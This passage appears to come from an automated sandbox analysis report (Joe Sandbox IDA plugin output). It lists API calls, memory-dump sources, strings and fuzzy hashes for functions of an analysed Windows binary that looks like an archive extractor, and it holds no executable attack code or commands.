                                                                                    • GetLastError.KERNEL32(?,01041030,00000200,010291AD,0102617E,?,?,?,?,0100D984,?,?,?,00000004,0100D710,?), ref: 0102986E
                                                                                    • _free.LIBCMT ref: 010298A3
                                                                                    • _free.LIBCMT ref: 010298CA
                                                                                    • SetLastError.KERNEL32(00000000,01033A34,00000050,01041030), ref: 010298D7
                                                                                    • SetLastError.KERNEL32(00000000,01033A34,00000050,01041030), ref: 010298E0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free
                                                                                    • String ID:
                                                                                    • API String ID: 3170660625-0
                                                                                    • Opcode ID: 2e990b45331276d0357e645e84872e35f69a080690b638a0c986e424f91b7eff
                                                                                    • Instruction ID: 94d8680c7ce6faa034e6ead7d51b6d70e6d318dffdf4a77fe5ba452f01adc7ac
                                                                                    • Opcode Fuzzy Hash: 2e990b45331276d0357e645e84872e35f69a080690b638a0c986e424f91b7eff
                                                                                    • Instruction Fuzzy Hash: 67012D36244632EBD3333238ACC4A5F26ADFFD167CF280136F5C596181EEB588064230
                                                                                    APIs
                                                                                      • Part of subcall function 010111CF: ResetEvent.KERNEL32(?), ref: 010111E1
                                                                                      • Part of subcall function 010111CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 010111F5
                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 01010F21
                                                                                    • CloseHandle.KERNEL32(?,?), ref: 01010F3B
                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 01010F54
                                                                                    • CloseHandle.KERNEL32(?), ref: 01010F60
                                                                                    • CloseHandle.KERNEL32(?), ref: 01010F6C
                                                                                      • Part of subcall function 01010FE4: WaitForSingleObject.KERNEL32(?,000000FF,01011206,?), ref: 01010FEA
                                                                                      • Part of subcall function 01010FE4: GetLastError.KERNEL32(?), ref: 01010FF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1868215902-0
                                                                                    • Opcode ID: 1c885d480c9c6eb4fcda13a2ba25f042eb0067a70e54a506de004dde64853db1
                                                                                    • Instruction ID: cd916ecec26834747e6e91f96997fdd2ab17f6b7fc3b79949b52777181375708
                                                                                    • Opcode Fuzzy Hash: 1c885d480c9c6eb4fcda13a2ba25f042eb0067a70e54a506de004dde64853db1
                                                                                    • Instruction Fuzzy Hash: D5014C76500B44EBC7229B65D8C5BC6FBADFB08711F00092DF2EA96558CB7A6984CB90
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0102C817
                                                                                      • Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
                                                                                      • Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4
                                                                                    • _free.LIBCMT ref: 0102C829
                                                                                    • _free.LIBCMT ref: 0102C83B
                                                                                    • _free.LIBCMT ref: 0102C84D
                                                                                    • _free.LIBCMT ref: 0102C85F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 9532f4d4a3fd4affec68d1d70fae4b6a6d33c1f341a884398edff04d5a0c2f93
                                                                                    • Instruction ID: c8333c06bd12d0ad7bae8cbed2d8f9fa469a73dc77f445144ff55acd70a39c69
                                                                                    • Opcode Fuzzy Hash: 9532f4d4a3fd4affec68d1d70fae4b6a6d33c1f341a884398edff04d5a0c2f93
                                                                                    • Instruction Fuzzy Hash: 7DF06232500221ABF670EA6CE584C5B77EDAA107207648C5BF2C8D7515CBB5F880CB60
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 01011FE5
                                                                                    • _wcslen.LIBCMT ref: 01011FF6
                                                                                    • _wcslen.LIBCMT ref: 01012006
                                                                                    • _wcslen.LIBCMT ref: 01012014
                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0100B371,?,?,00000000,?,?,?), ref: 0101202F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$CompareString
                                                                                    • String ID:
                                                                                    • API String ID: 3397213944-0
                                                                                    • Opcode ID: 20983f28d8e15bd1cbf9ca4333589933f75c208e4875693d2af2679952bc31cb
                                                                                    • Instruction ID: dedb9b0371da9c1cdf57d482c1c875e6784c658ef16abffee9ac1bdc85751d4a
                                                                                    • Opcode Fuzzy Hash: 20983f28d8e15bd1cbf9ca4333589933f75c208e4875693d2af2679952bc31cb
                                                                                    • Instruction Fuzzy Hash: 52F01D32008125BBCF226F51EC08DCE7F26EB44760B218415F69A5E0A1CB76D965D690
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _swprintf
                                                                                    • String ID: %ls$%s: %s
                                                                                    • API String ID: 589789837-2259941744
                                                                                    • Opcode ID: fe065ab3a9cc5eff1da0322037684990a1a80f09f798f740996de3738fee35c5
                                                                                    • Instruction ID: d31775acd51c765dfa0a4ea334c43984f661dd46a68a754d96ee2ed87854c4e7
                                                                                    • Opcode Fuzzy Hash: fe065ab3a9cc5eff1da0322037684990a1a80f09f798f740996de3738fee35c5
                                                                                    • Instruction Fuzzy Hash: D251D535288301F6F62A1AB48D45F7D7676BB19B08F048D46F7C6784E8D9BFA410871A
                                                                                    APIs
                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 010231FB
                                                                                    • _abort.LIBCMT ref: 01023306
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: EncodePointer_abort
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 948111806-2084237596
                                                                                    • Opcode ID: 9991bcedfb5ba944ca20776345c51734571332bf0aff8fd387d73a6e3577be4e
                                                                                    • Instruction ID: c858d9e6591e3be99bb352e16ecf85288f4dd1bef9b27f5543531d9304656829
                                                                                    • Opcode Fuzzy Hash: 9991bcedfb5ba944ca20776345c51734571332bf0aff8fd387d73a6e3577be4e
                                                                                    • Instruction Fuzzy Hash: A7418D71900229AFDF16DF98CC81AEEBBB5FF09304F188099FA446B211D339E950DB50
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 01007406
                                                                                      • Part of subcall function 01003BBA: __EH_prolog.LIBCMT ref: 01003BBF
                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 010074CD
                                                                                      • Part of subcall function 01007A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 01007AAB
                                                                                      • Part of subcall function 01007A9C: GetLastError.KERNEL32 ref: 01007AF1
                                                                                      • Part of subcall function 01007A9C: CloseHandle.KERNEL32(?), ref: 01007B00
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                    • API String ID: 3813983858-639343689
                                                                                    • Opcode ID: 2b78e14c86bcfce8256ce7ae79a54d657d33c495778037f924c0f34688ae90e7
                                                                                    • Instruction ID: 6f04a2c1c482d9154cff54d49baf06ef2644776e36e69643ee98bc2ddebb20c5
                                                                                    • Opcode Fuzzy Hash: 2b78e14c86bcfce8256ce7ae79a54d657d33c495778037f924c0f34688ae90e7
                                                                                    • Instruction Fuzzy Hash: 5731D671E00259AAFF63EBA8CC44BEE7BA9BF55300F044055E5C5AB1C1CBB9A984C761
                                                                                    APIs
                                                                                      • Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
                                                                                      • Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0101AD98
                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0101ADAD
                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0101ADC2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: ASKNEXTVOL
                                                                                    • API String ID: 445417207-3402441367
                                                                                    • Opcode ID: a9525abd271ca87f4d914b22a003b4b4bc751f2406a0cd9fce8c509dc002820c
                                                                                    • Instruction ID: 94bc755e958b0fdd24a033ed09095d4b0464aa2dc4a6026eed6cd84fb23f48e5
                                                                                    • Opcode Fuzzy Hash: a9525abd271ca87f4d914b22a003b4b4bc751f2406a0cd9fce8c509dc002820c
                                                                                    • Instruction Fuzzy Hash: 5011B132345641FFE262AF6CDC45FAA7BA9EB4A752F800044F2C2DB0ACC77B94059721
                                                                                    APIs
                                                                                    • __fprintf_l.LIBCMT ref: 0100D954
                                                                                    • _strncpy.LIBCMT ref: 0100D99A
                                                                                      • Part of subcall function 01011DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,01041030,00000200,0100D928,00000000,?,00000050,01041030), ref: 01011DC4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                    • String ID: $%s$@%s
                                                                                    • API String ID: 562999700-834177443
                                                                                    • Opcode ID: 7ca9fca125aab86798e96f28070bd920c222cb15f092ddd28ea1776cdc1b49b5
                                                                                    • Instruction ID: 31def597853391b9143afd0f81739381f4809b5670d312a1ccd3346a033f7f1a
                                                                                    • Opcode Fuzzy Hash: 7ca9fca125aab86798e96f28070bd920c222cb15f092ddd28ea1776cdc1b49b5
                                                                                    • Instruction Fuzzy Hash: 3321D532800648AEFB22EEE8CC41FDE3BE9BF01300F040516FA909A1D1E332D249CB61
                                                                                    APIs
                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0100AC5A,00000008,?,00000000,?,0100D22D,?,00000000), ref: 01010E85
                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0100AC5A,00000008,?,00000000,?,0100D22D,?,00000000), ref: 01010E8F
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0100AC5A,00000008,?,00000000,?,0100D22D,?,00000000), ref: 01010E9F
                                                                                    Strings
                                                                                    • Thread pool initialization failed., xrefs: 01010EB7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                    • String ID: Thread pool initialization failed.
                                                                                    • API String ID: 3340455307-2182114853
                                                                                    • Opcode ID: 7f34a4e5cfc6d33f48118ab8da79ed0509bfe8c3620a1aaf27b64783884c3925
                                                                                    • Instruction ID: da2b9517c12fdba17235caf7bda789cfad4f18e756de8c845cd89ed6d4cb695c
                                                                                    • Opcode Fuzzy Hash: 7f34a4e5cfc6d33f48118ab8da79ed0509bfe8c3620a1aaf27b64783884c3925
                                                                                    • Instruction Fuzzy Hash: 251151B16407099FD3314F6B98849A7FBECFB65754F14482EF1DAC6204D6B659808B50
                                                                                    APIs
                                                                                      • Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
                                                                                      • Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0101B2BE
                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0101B2D6
                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0101B304
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: GETPASSWORD1
                                                                                    • API String ID: 445417207-3292211884
                                                                                    • Opcode ID: 54a9b1b3c6ffad30263a138ffa0d1418e5df188ccd07da384aab28c917c4c374
                                                                                    • Instruction ID: 90168126a2390076cb5a9fa0461ac914f159448eabecc3f165c506425d23e3c1
                                                                                    • Opcode Fuzzy Hash: 54a9b1b3c6ffad30263a138ffa0d1418e5df188ccd07da384aab28c917c4c374
                                                                                    • Instruction Fuzzy Hash: E0110832900115B7EB629A689D49FFF7BBCFF59700F004050FAC5F60C8C7A9A91987A1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                    • API String ID: 0-56093855
                                                                                    • Opcode ID: 403203eb5b5d5608aec34c41f773c0d57d40c16a6a7daddeda83fe341a8446e6
                                                                                    • Instruction ID: a9b5f280b4583966a2c437509cd04fa4607b2dc3464208648edfb99c05be1b8c
                                                                                    • Opcode Fuzzy Hash: 403203eb5b5d5608aec34c41f773c0d57d40c16a6a7daddeda83fe341a8446e6
                                                                                    • Instruction Fuzzy Hash: 6301F5B9604244AFD730AED8FD8899A7FA8F748340B00482AF5C5C3228C73ED850DBA0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: __alldvrm$_strrchr
                                                                                    • String ID:
                                                                                    • API String ID: 1036877536-0
                                                                                    • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                                    • Instruction ID: cf92f794dcef4a994ff41bcbf41fdddc51641b6d8b2ae45c24af45c74368076a
                                                                                    • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                                    • Instruction Fuzzy Hash: 5BA129729043BA9FEB26CF18C8917AEBFE5EF55318F2841ADD9C59B281C2398941C750
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,01007F69,?,?,?), ref: 0100A3FA
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,01007F69,?), ref: 0100A43E
                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,01007F69,?,?,?,?,?,?,?), ref: 0100A4BF
                                                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,01007F69,?,?,?,?,?,?,?,?,?,?), ref: 0100A4C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                    • String ID:
                                                                                    • API String ID: 2287278272-0
                                                                                    • Opcode ID: 4f6ac1af2a0118dd9921621cc8f9bb45d9dba1c197abcf4cc11a6392a6b8f2cc
                                                                                    • Instruction ID: 020702c7db62fd5d77cef9a6f518e718593e5a6ad10676109ccb3f7a767d3cb5
                                                                                    • Opcode Fuzzy Hash: 4f6ac1af2a0118dd9921621cc8f9bb45d9dba1c197abcf4cc11a6392a6b8f2cc
                                                                                    • Instruction Fuzzy Hash: E841AF312483819AF732DE28DC55FEFBBE8AB85700F04495DB6D1D71C0DAB89A48DB52
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 176396367-0
                                                                                    • Opcode ID: cce129f31006e27da8112d56d0a1eda3a571ded943039947c7734ebb97adca33
